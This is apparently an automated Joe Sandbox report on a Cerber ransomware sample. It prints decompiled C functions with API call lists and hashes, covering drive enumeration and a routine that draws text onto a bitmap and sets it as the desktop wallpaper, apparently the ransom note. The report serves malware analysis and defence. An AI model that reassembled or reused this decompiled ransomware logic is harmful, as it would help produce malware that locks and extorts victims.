                                                                                                                                                                                        • PostMessageW.USER32(?,00000111,00000002,00000000), ref: 004066E4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: MessagePost
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 410705778-0
                                                                                                                                                                                        • Opcode ID: 2d58d8add38293ab42b189ebc6e52ffaf17656ce9072161d736303f85cdc37c5
                                                                                                                                                                                        • Instruction ID: 58071ac7e67bca16a1a60f0a94fc769f562db5208c4ac91bb24582f556c60f10
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d58d8add38293ab42b189ebc6e52ffaf17656ce9072161d736303f85cdc37c5
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD01270244304AFD704DF61D84AB6A77D1AF84709F10481DF6826A1C1D6B58414EB26
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E00404EA5(WCHAR* _a4) {
                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t4 = GetFileAttributesW(_a4); // executed
                                                                                                                                                                                        				return 0 | _t4 != 0xffffffff;
                                                                                                                                                                                        			}




                                                                                                                                                                                        0x00404ea9
                                                                                                                                                                                        0x00404eb9

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00402C7B,00000000,0040D1E8,00000018,88B820F2,00402B2A,00000000,00406B45,?,00000000,?,00000000,-00000006), ref: 00404EA9
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                        • Opcode ID: 58b04887cf9564524778792e60d30107c1beba6fcb132c212822ae6046ecd1e9
                                                                                                                                                                                        • Instruction ID: bbb8cf1cb537a297bfb223683202dd81dc390b3e2bc649c9f671bb5a52675b16
                                                                                                                                                                                        • Opcode Fuzzy Hash: 58b04887cf9564524778792e60d30107c1beba6fcb132c212822ae6046ecd1e9
                                                                                                                                                                                        • Instruction Fuzzy Hash: F0B0127D2910004BCB180734AD4508E75506F84631720477CB033D04F0D731CC61BA04
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E0040562B(int __eax, WCHAR* _a4) {
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                        				int _t14;
                                                                                                                                                                                        				void* _t17;
                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                        				void* _t22;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t15 = __eax;
                                                                                                                                                                                        				_t20 = 0;
                                                                                                                                                                                        				if(__eax != 0) {
                                                                                                                                                                                        					L2:
                                                                                                                                                                                        					_t8 = E00405594(_t15, 0, _a4, _t20); // executed
                                                                                                                                                                                        					_t24 = _t8;
                                                                                                                                                                                        					_t17 = _t22;
                                                                                                                                                                                        					if(_t8 != 0) {
                                                                                                                                                                                        						_t20 = E004053BD(_t17);
                                                                                                                                                                                        						if(_t20 != 0) {
                                                                                                                                                                                        							_t12 = E0040560B(_t24, _a4, _t15);
                                                                                                                                                                                        							if(_t12 == 0) {
                                                                                                                                                                                        								E00405463(_t20);
                                                                                                                                                                                        								_t20 = 0;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								 *((char*)(_t12 + _t20)) = 0;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					return _t20;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t14 = lstrlenW(_a4);
                                                                                                                                                                                        				_t15 = _t14;
                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlenW.KERNEL32(?,00000000,004038B6,00405752,00000000,?,00000001,?,?,0040373F,?,?,?,?,?,00000000), ref: 00405639
                                                                                                                                                                                          • Part of subcall function 00405463: GetLastError.KERNEL32(00000000,00405722), ref: 0040546D
                                                                                                                                                                                          • Part of subcall function 00405463: RtlFreeHeap.NTDLL(00000000,-00000008), ref: 0040549A
                                                                                                                                                                                          • Part of subcall function 00405463: SetLastError.KERNEL32(00000000), ref: 004054A1
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ErrorLast$FreeHeaplstrlen
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1699902910-0
                                                                                                                                                                                        • Opcode ID: 9be68d88605cc9a3ab19978fb24a9ff80f150417492ed5a5cbe71227c020fb94
                                                                                                                                                                                        • Instruction ID: 8f47999d6441de1606a46da9c65c5938dd2289a697ef7c270dda7bccf784f778
                                                                                                                                                                                        • Opcode Fuzzy Hash: 9be68d88605cc9a3ab19978fb24a9ff80f150417492ed5a5cbe71227c020fb94
                                                                                                                                                                                        • Instruction Fuzzy Hash: B3F0C832208A115FD722592A5C4052B67D6CBC47747660A3BF818B73D1EA7B8C014EA9
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                        			E0040A892(signed int _a4, WCHAR* _a8) {
                                                                                                                                                                                        				short _v8;
                                                                                                                                                                                        				short _v10;
                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                        				short _t16;
                                                                                                                                                                                        				short _t19;
                                                                                                                                                                                        				signed char _t22;
                                                                                                                                                                                        				short _t25;
                                                                                                                                                                                        
                                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                                        				_push(_t22);
                                                                                                                                                                                        				_t25 = 0;
                                                                                                                                                                                        				if((_a4 & 1 << _t22) != 0) {
                                                                                                                                                                                        					_v12 = _t22 + 0x41;
                                                                                                                                                                                        					_t16 = 0x3a;
                                                                                                                                                                                        					_v10 = _t16;
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					_t19 = E0040A150( &_v12); // executed
                                                                                                                                                                                        					_t25 = _t19;
                                                                                                                                                                                        					if(_t25 != 0) {
                                                                                                                                                                                        						lstrcpyW(_a8,  &_v12);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t25;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040A150: GetDriveTypeW.KERNEL32(00000000,00000000), ref: 0040A15D
                                                                                                                                                                                          • Part of subcall function 0040A150: QueryDosDeviceW.KERNEL32(00000000,?,00000208), ref: 0040A183
                                                                                                                                                                                          • Part of subcall function 0040A150: StrCmpNW.SHLWAPI(?,00000000,?,?,00000004), ref: 0040A1AB
                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,00000000), ref: 0040A8D4
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: DeviceDriveQueryTypelstrcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1343905201-0
                                                                                                                                                                                        • Opcode ID: fb8214b57ff391eef166a269f4d041575812d1a1ca94e8a2537d2988d6348e61
                                                                                                                                                                                        • Instruction ID: 143d95b2e26e474ba70c68f4ebdd59fdd72542839aac86a6ec3040addcf4e822
                                                                                                                                                                                        • Opcode Fuzzy Hash: fb8214b57ff391eef166a269f4d041575812d1a1ca94e8a2537d2988d6348e61
                                                                                                                                                                                        • Instruction Fuzzy Hash: 1DF08C36910229BBCB14EBE0D8019DEB7A8EF04790B108176EC04EA240E6348A518399
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 91%
                                                                                                                                                                                        			E004089AC(signed int __edx, void* __eflags, char _a4) {
                                                                                                                                                                                        				struct HDC__* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				long _v20;
                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                        				struct HDC__* _v36;
                                                                                                                                                                                        				void* _v40;
                                                                                                                                                                                        				struct tagRECT _v56;
                                                                                                                                                                                        				void* _v60;
                                                                                                                                                                                        				void* _v64;
                                                                                                                                                                                        				struct tagRECT _v80;
                                                                                                                                                                                        				intOrPtr _v86;
                                                                                                                                                                                        				intOrPtr _v94;
                                                                                                                                                                                        				void _v96;
                                                                                                                                                                                        				int _v120;
                                                                                                                                                                                        				signed int _v122;
                                                                                                                                                                                        				short _v124;
                                                                                                                                                                                        				signed int _v128;
                                                                                                                                                                                        				void _v132;
                                                                                                                                                                                        				void _v136;
                                                                                                                                                                                        				int _v152;
                                                                                                                                                                                        				signed int _v156;
                                                                                                                                                                                        				void _v160;
                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				void* _t99;
                                                                                                                                                                                        				struct HDC__* _t101;
                                                                                                                                                                                        				void* _t104;
                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                        				struct HDC__* _t111;
                                                                                                                                                                                        				int _t114;
                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                        				int _t118;
                                                                                                                                                                                        				signed int _t123;
                                                                                                                                                                                        				void* _t125;
                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                        				signed int _t144;
                                                                                                                                                                                        				signed int _t159;
                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                        				WCHAR* _t167;
                                                                                                                                                                                        				void* _t169;
                                                                                                                                                                                        				signed char _t189;
                                                                                                                                                                                        				signed char _t191;
                                                                                                                                                                                        				int _t195;
                                                                                                                                                                                        				void* _t201;
                                                                                                                                                                                        				void* _t202;
                                                                                                                                                                                        				signed int _t207;
                                                                                                                                                                                        				signed int _t210;
                                                                                                                                                                                        				signed int _t212;
                                                                                                                                                                                        				signed int _t214;
                                                                                                                                                                                        				signed int _t216;
                                                                                                                                                                                        				signed int _t219;
                                                                                                                                                                                        				struct HDC__* _t221;
                                                                                                                                                                                        				int _t223;
                                                                                                                                                                                        				struct HDC__* _t230;
                                                                                                                                                                                        				void* _t236;
                                                                                                                                                                                        				long _t240;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t214 = __edx;
                                                                                                                                                                                        				_t99 = E00405905(0x40d738, 9, 0xf223c378);
                                                                                                                                                                                        				_t1 =  &_a4; // 0x40667b
                                                                                                                                                                                        				_t101 = E004031AF( *_t1, __eflags, _t99);
                                                                                                                                                                                        				_t221 = _t101;
                                                                                                                                                                                        				_v16 = _t221;
                                                                                                                                                                                        				_t259 = _t221;
                                                                                                                                                                                        				if(_t221 != 0) {
                                                                                                                                                                                        					_t104 = E004031AF(_t221, _t259, E00405905(0x40d76c, 0x10, 0x1f2f764e));
                                                                                                                                                                                        					_pop(_t201);
                                                                                                                                                                                        					_t101 = E00403253(_t104, _t259) | _t214;
                                                                                                                                                                                        					_t260 = _t101;
                                                                                                                                                                                        					if(_t101 != 0) {
                                                                                                                                                                                        						_push( &_v40);
                                                                                                                                                                                        						_t109 = E004031AF(_t221, _t260, E00405905(0x40d514, 4, 0x22a8cdeb));
                                                                                                                                                                                        						_t202 = _t201;
                                                                                                                                                                                        						_t101 = E004078F0(E004032B8(_t109, _t260), _t202, _t214);
                                                                                                                                                                                        						_v28 = _t101;
                                                                                                                                                                                        						if(_t101 != 0) {
                                                                                                                                                                                        							_t101 = GetDC(0);
                                                                                                                                                                                        							_t230 = _t101;
                                                                                                                                                                                        							_v36 = _t230;
                                                                                                                                                                                        							if(_t230 != 0) {
                                                                                                                                                                                        								_t111 = CreateCompatibleDC(_t230);
                                                                                                                                                                                        								_v12 = _t111;
                                                                                                                                                                                        								if(_t111 == 0) {
                                                                                                                                                                                        									L20:
                                                                                                                                                                                        									return ReleaseDC(0, _t230);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t223 = GetDeviceCaps(_t230, 8);
                                                                                                                                                                                        								_t114 = GetDeviceCaps(_t230, 0xa);
                                                                                                                                                                                        								_v24 = _t114;
                                                                                                                                                                                        								_t115 = CreateCompatibleBitmap(_t230, _t223, _t114);
                                                                                                                                                                                        								_v32 = _t115;
                                                                                                                                                                                        								_t264 = _t115;
                                                                                                                                                                                        								if(_t115 == 0) {
                                                                                                                                                                                        									L19:
                                                                                                                                                                                        									_t98 =  &_v12; // 0x40667b
                                                                                                                                                                                        									DeleteDC( *_t98);
                                                                                                                                                                                        									goto L20;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t9 =  &_v12; // 0x40667b
                                                                                                                                                                                        								_v40 = SelectObject( *_t9, _t115);
                                                                                                                                                                                        								_t118 = GetDeviceCaps(_t230, 0x5a);
                                                                                                                                                                                        								_t123 = MulDiv(E00403253(E004031AF(_v16, _t264, E00405905( &E0040D744, 4, 0x149d4cf6)), _t264), _t118, 0x48);
                                                                                                                                                                                        								_t125 = CreateFontW( ~_t123, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 4, 0, E0040591C(0x40d74c, 8, 0xaf2a2560));
                                                                                                                                                                                        								_v64 = _t125;
                                                                                                                                                                                        								_t265 = _t125;
                                                                                                                                                                                        								if(_t125 == 0) {
                                                                                                                                                                                        									L18:
                                                                                                                                                                                        									SelectObject(_v12, _v40);
                                                                                                                                                                                        									DeleteObject(_v32);
                                                                                                                                                                                        									_t230 = _v36;
                                                                                                                                                                                        									goto L19;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_v60 = SelectObject(_v12, _t125);
                                                                                                                                                                                        								SetBkColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d758, 0xa, 0xac908572)), _t265));
                                                                                                                                                                                        								SetTextColor(_v12, E00403253(E004031AF(_v16, _t265, E00405905(0x40d764, 5, 0xb1a3f726)), _t265));
                                                                                                                                                                                        								_t236 = _v24;
                                                                                                                                                                                        								_v56.left = 0;
                                                                                                                                                                                        								_v56.top = 0;
                                                                                                                                                                                        								_v56.right = _t223;
                                                                                                                                                                                        								_v56.bottom = _t236;
                                                                                                                                                                                        								FillRect(_v12,  &_v56, GetStockObject(2));
                                                                                                                                                                                        								_t143 = _t236 * _t223;
                                                                                                                                                                                        								_t207 = 0xa;
                                                                                                                                                                                        								_t144 = _t143 / _t207;
                                                                                                                                                                                        								_t216 = _t143 % _t207;
                                                                                                                                                                                        								if(_t144 <= 0) {
                                                                                                                                                                                        									L11:
                                                                                                                                                                                        									_v80.left = 0;
                                                                                                                                                                                        									_v80.top = 0;
                                                                                                                                                                                        									_v80.right = _t223;
                                                                                                                                                                                        									_v80.bottom = _t236;
                                                                                                                                                                                        									DrawTextA(_v12, _v28, 0xffffffff,  &_v80, 0x411);
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_v56.top = (_v56.bottom - _t216 >> 1) - (_v80.bottom - _t216 >> 1);
                                                                                                                                                                                        									DrawTextA(_v12, _v28, 0xffffffff,  &_v56, 0x11);
                                                                                                                                                                                        									GetObjectW(_v32, 0x18,  &_v160);
                                                                                                                                                                                        									_t210 = 9;
                                                                                                                                                                                        									memset( &_v132, 0, _t210 << 2);
                                                                                                                                                                                        									_t159 = _v156;
                                                                                                                                                                                        									_t212 = _v152;
                                                                                                                                                                                        									_v132 = _t159;
                                                                                                                                                                                        									_v124 = 1;
                                                                                                                                                                                        									_t219 = 0x20;
                                                                                                                                                                                        									_v122 = _t219;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									_t240 = ((_t219 & 0x0000001f) + (_t159 << 5) + 0x1f >> 5) * _t212 << 2;
                                                                                                                                                                                        									_v136 = 0x28;
                                                                                                                                                                                        									_v128 = _t212;
                                                                                                                                                                                        									_v120 = 0;
                                                                                                                                                                                        									_t162 = E004053BD(_t212);
                                                                                                                                                                                        									_v24 = _t162;
                                                                                                                                                                                        									if(_t162 != 0) {
                                                                                                                                                                                        										GetDIBits(_v36, _v32, 0, _v152, _t162,  &_v136, 0);
                                                                                                                                                                                        										_t167 = E00404D43(E0040591C(0x40d780, 4, 0x91fa4d45));
                                                                                                                                                                                        										_v28 = _t167;
                                                                                                                                                                                        										if(_t167 != 0) {
                                                                                                                                                                                        											_t169 = CreateFileW(_t167, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                        											_v16 = _t169;
                                                                                                                                                                                        											if(_t169 != 0xffffffff) {
                                                                                                                                                                                        												asm("stosd");
                                                                                                                                                                                        												asm("stosd");
                                                                                                                                                                                        												asm("stosd");
                                                                                                                                                                                        												_v94 = _t240 + 0x36;
                                                                                                                                                                                        												_v96 = 0x4d42;
                                                                                                                                                                                        												_v86 = 0x36;
                                                                                                                                                                                        												_v20 = 0;
                                                                                                                                                                                        												WriteFile(_v16,  &_v96, 0xe,  &_v20, 0);
                                                                                                                                                                                        												WriteFile(_v16,  &_v136, 0x28,  &_v20, 0);
                                                                                                                                                                                        												WriteFile(_v16, _v24, _t240,  &_v20, 0);
                                                                                                                                                                                        												CloseHandle(_v16);
                                                                                                                                                                                        												SystemParametersInfoW(0x14, 0, _v28, 3);
                                                                                                                                                                                        											}
                                                                                                                                                                                        											E00405463(_v28);
                                                                                                                                                                                        										}
                                                                                                                                                                                        										E00405463(_v24);
                                                                                                                                                                                        									}
                                                                                                                                                                                        									SelectObject(_v12, _v60);
                                                                                                                                                                                        									DeleteObject(_v64);
                                                                                                                                                                                        									goto L18;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_v20 = _t144;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_v16 = (E004063E1(0xff) & 0x000000ff) << 8;
                                                                                                                                                                                        									_t189 = E004063E1(0xff);
                                                                                                                                                                                        									_t191 = E004063E1(0xff);
                                                                                                                                                                                        									_t195 = E004063E1(_v56.bottom);
                                                                                                                                                                                        									SetPixel(_v12, E004063E1(_v56.right), _t195, _t191 & 0x000000ff | (_t189 & 0x000000ff | _v16) << 0x00000008);
                                                                                                                                                                                        									_t36 =  &_v20;
                                                                                                                                                                                        									 *_t36 = _v20 - 1;
                                                                                                                                                                                        								} while ( *_t36 != 0);
                                                                                                                                                                                        								_t236 = _v24;
                                                                                                                                                                                        								goto L11;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t101;
                                                                                                                                                                                        			}
                                                                                                                                                                                        0x00408b0c
                                                                                                                                                                                        0x00408b12
                                                                                                                                                                                        0x00408b15
                                                                                                                                                                                        0x00408b17
                                                                                                                                                                                        0x00408dd2
                                                                                                                                                                                        0x00408dd8
                                                                                                                                                                                        0x00408de1
                                                                                                                                                                                        0x00408de7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00408de7
                                                                                                                                                                                        0x00408b33
                                                                                                                                                                                        0x00408b53
                                                                                                                                                                                        0x00408b82
                                                                                                                                                                                        0x00408b88
                                                                                                                                                                                        0x00408b8d
                                                                                                                                                                                        0x00408b90
                                                                                                                                                                                        0x00408b93
                                                                                                                                                                                        0x00408b96
                                                                                                                                                                                        0x00408ba7
                                                                                                                                                                                        0x00408baf
                                                                                                                                                                                        0x00408bb6
                                                                                                                                                                                        0x00408bb7
                                                                                                                                                                                        0x00408bb7
                                                                                                                                                                                        0x00408bbb
                                                                                                                                                                                        0x00408c18
                                                                                                                                                                                        0x00408c26
                                                                                                                                                                                        0x00408c2c
                                                                                                                                                                                        0x00408c2f
                                                                                                                                                                                        0x00408c32
                                                                                                                                                                                        0x00408c35
                                                                                                                                                                                        0x00408c3e
                                                                                                                                                                                        0x00408c46
                                                                                                                                                                                        0x00408c51
                                                                                                                                                                                        0x00408c60
                                                                                                                                                                                        0x00408c72
                                                                                                                                                                                        0x00408c7c
                                                                                                                                                                                        0x00408c82
                                                                                                                                                                                        0x00408c84
                                                                                                                                                                                        0x00408c8a
                                                                                                                                                                                        0x00408c91
                                                                                                                                                                                        0x00408c94
                                                                                                                                                                                        0x00408c9d
                                                                                                                                                                                        0x00408c9e
                                                                                                                                                                                        0x00408ca5
                                                                                                                                                                                        0x00408cb2
                                                                                                                                                                                        0x00408cb7
                                                                                                                                                                                        0x00408cc1
                                                                                                                                                                                        0x00408cc4
                                                                                                                                                                                        0x00408cc7
                                                                                                                                                                                        0x00408ccc
                                                                                                                                                                                        0x00408cd1
                                                                                                                                                                                        0x00408ced
                                                                                                                                                                                        0x00408d09
                                                                                                                                                                                        0x00408d0e
                                                                                                                                                                                        0x00408d13
                                                                                                                                                                                        0x00408d2a
                                                                                                                                                                                        0x00408d30
                                                                                                                                                                                        0x00408d36
                                                                                                                                                                                        0x00408d3d
                                                                                                                                                                                        0x00408d3e
                                                                                                                                                                                        0x00408d3f
                                                                                                                                                                                        0x00408d43
                                                                                                                                                                                        0x00408d4c
                                                                                                                                                                                        0x00408d5d
                                                                                                                                                                                        0x00408d64
                                                                                                                                                                                        0x00408d67
                                                                                                                                                                                        0x00408d7e
                                                                                                                                                                                        0x00408d90
                                                                                                                                                                                        0x00408d99
                                                                                                                                                                                        0x00408da7
                                                                                                                                                                                        0x00408da7
                                                                                                                                                                                        0x00408db0
                                                                                                                                                                                        0x00408db0
                                                                                                                                                                                        0x00408db8
                                                                                                                                                                                        0x00408db8
                                                                                                                                                                                        0x00408dc3
                                                                                                                                                                                        0x00408dcc
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00408dcc
                                                                                                                                                                                        0x00408bbd
                                                                                                                                                                                        0x00408bc0
                                                                                                                                                                                        0x00408bd2
                                                                                                                                                                                        0x00408bd7
                                                                                                                                                                                        0x00408bea
                                                                                                                                                                                        0x00408bf8
                                                                                                                                                                                        0x00408c0a
                                                                                                                                                                                        0x00408c10
                                                                                                                                                                                        0x00408c10
                                                                                                                                                                                        0x00408c10
                                                                                                                                                                                        0x00408c15
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00408c15
                                                                                                                                                                                        0x00408a5c
                                                                                                                                                                                        0x00408a48
                                                                                                                                                                                        0x00408a0b
                                                                                                                                                                                        0x00408dff

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 004031AF: lstrcmpi.KERNEL32(?,00000000), ref: 004031E6
                                                                                                                                                                                          • Part of subcall function 004078F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000), ref: 004078FF
                                                                                                                                                                                          • Part of subcall function 004078F0: StrCmpNIA.SHLWAPI(00000000,00000000,?,?,0000000A), ref: 00407938
                                                                                                                                                                                        • GetDC.USER32(00000000), ref: 00408A4F
                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00408A63
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00408A77
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00408A82
                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000000,00000000), ref: 00408A8E
                                                                                                                                                                                        • SelectObject.GDI32({f@,00000000), ref: 00408AA3
                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00408AB1
                                                                                                                                                                                        • MulDiv.KERNEL32(00000000), ref: 00408ADE
                                                                                                                                                                                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000004,00000000,00000000), ref: 00408B0C
                                                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00408B21
                                                                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00408B53
                                                                                                                                                                                          • Part of subcall function 00403253: StrToInt64ExA.SHLWAPI(?,00000000,?,F5C6A5FE,?,?,?,00402CB1,?,?,?,00000000,00000000,00406B45,?,00000000), ref: 004032A9
                                                                                                                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00408B82
                                                                                                                                                                                        • GetStockObject.GDI32(00000002), ref: 00408B99
                                                                                                                                                                                        • FillRect.USER32(?,?,00000000), ref: 00408BA7
                                                                                                                                                                                        • SetPixel.GDI32(?,00000000,00000000,?), ref: 00408C0A
                                                                                                                                                                                        • DrawTextA.USER32(?,?,000000FF,?,00000411), ref: 00408C35
                                                                                                                                                                                        • DrawTextA.USER32(?,?,000000FF,?,00000011), ref: 00408C60
                                                                                                                                                                                        • GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408C72
                                                                                                                                                                                        • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00408CED
                                                                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00408D2A
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,0000000E,?,00000000), ref: 00408D67
                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000028,00000028,?,00000000), ref: 00408D7E
                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00408D90
                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00408D99
                                                                                                                                                                                        • SystemParametersInfoW.USER32(00000014,00000000,?,00000003), ref: 00408DA7
                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00408DC3
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408DCC
                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00408DD8
                                                                                                                                                                                        • DeleteObject.GDI32(?), ref: 00408DE1
                                                                                                                                                                                        • DeleteDC.GDI32({f@), ref: 00408DED
                                                                                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00408DF5
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Object$CreateFileSelect$CapsDeleteDeviceTextWrite$ColorCompatibleDraw$BitmapBitsCloseFillFontHandleInfoInt64ParametersPixelRectReleaseStockSystemlstrcmpilstrlen
                                                                                                                                                                                        • String ID: {f@${f@
                                                                                                                                                                                        • API String ID: 2080757576-3352485320
                                                                                                                                                                                        • Opcode ID: aedb9ef7960e73c4434157ea5a2a6b2b3e083f41ac50908eb0ab93981d7f6be4
                                                                                                                                                                                        • Instruction ID: 2856dbb673b69ec4cade2b047b667f652ddefbff5f4d6f99c4febc8329f0e424
                                                                                                                                                                                        • Opcode Fuzzy Hash: aedb9ef7960e73c4434157ea5a2a6b2b3e083f41ac50908eb0ab93981d7f6be4
